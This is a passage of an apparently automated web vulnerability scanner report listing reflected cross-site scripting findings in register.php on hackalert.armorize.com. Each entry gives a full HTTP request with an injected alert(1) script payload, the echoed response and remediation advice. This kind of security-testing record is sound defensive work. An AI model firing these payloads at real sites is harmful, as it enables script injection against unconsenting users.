<a href="/register.php/42087"><script>alert(1)</script>e5477b0b5c0/_js/doFx.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.68. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90547"-alert(1)-"d152766ca9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C90547"-alert(1)-"d152766ca9f/_js/doFx.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:01:46 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<90547"-alert(1)-"d152766ca9f/_js/doFx.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.69. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 11104%3balert(1)//b2747dc2468 was submitted in the REST URL parameter 3. This input was echoed as 11104;alert(1)//b2747dc2468 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js11104%3balert(1)//b2747dc2468/doFx.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:09:17 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js11104;alert(1)//b2747dc2468/doFx.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.70. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a468b"-alert(1)-"f3421dcbcb2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_jsa468b"-alert(1)-"f3421dcbcb2/doFx.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:03:46 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_jsa468b"-alert(1)-"f3421dcbcb2/doFx.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.71. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3f88e%3balert(1)//0832fc1f8e6 was submitted in the REST URL parameter 4. This input was echoed as 3f88e;alert(1)//0832fc1f8e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js3f88e%3balert(1)//0832fc1f8e6 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:13:53 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/doFx.js3f88e;alert(1)//0832fc1f8e6?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.72. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4785c"-alert(1)-"a0ff127d5d1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js4785c"-alert(1)-"a0ff127d5d1 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:12:38 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/doFx.js4785c"-alert(1)-"a0ff127d5d1?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.73. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10e54"><script>alert(1)</script>922f5c37426 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/10e54"><script>alert(1)</script>922f5c37426/_js/dom-drag.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:57:59 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/10e54"><script>alert(1)</script>922f5c37426/_js/dom-drag.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.74. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2e50a%3balert(1)//ea1282f5d1e was submitted in the REST URL parameter 2. This input was echoed as 2e50a;alert(1)//ea1282f5d1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C2e50a%3balert(1)//ea1282f5d1e/_js/dom-drag.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:00:45 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<2e50a;alert(1)//ea1282f5d1e/_js/dom-drag.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.75. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22eef"-alert(1)-"0cf45b84078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C22eef"-alert(1)-"0cf45b84078/_js/dom-drag.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:59:52 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<22eef"-alert(1)-"0cf45b84078/_js/dom-drag.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.76. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3697d"-alert(1)-"432bf243bd8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js3697d"-alert(1)-"432bf243bd8/dom-drag.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:01:40 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js3697d"-alert(1)-"432bf243bd8/dom-drag.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.77. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e9324%3balert(1)//7c25ddbf1fc was submitted in the REST URL parameter 3. This input was echoed as e9324;alert(1)//7c25ddbf1fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_jse9324%3balert(1)//7c25ddbf1fc/dom-drag.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:03:03 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_jse9324;alert(1)//7c25ddbf1fc/dom-drag.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.78. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 869fa%3balert(1)//92ce6ba322 was submitted in the REST URL parameter 4. This input was echoed as 869fa;alert(1)//92ce6ba322 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js869fa%3balert(1)//92ce6ba322 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:09:05 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/dom-drag.js869fa;alert(1)//92ce6ba322?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.79. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0303"-alert(1)-"4ec4b1aa242 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.jsb0303"-alert(1)-"4ec4b1aa242 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:08:39 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/dom-drag.jsb0303"-alert(1)-"4ec4b1aa242?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.80. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 650c9"><script>alert(1)</script>9f248f4ee0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/650c9"><script>alert(1)</script>9f248f4ee0a/_js/mootools.v1.11.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:01:25 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153910

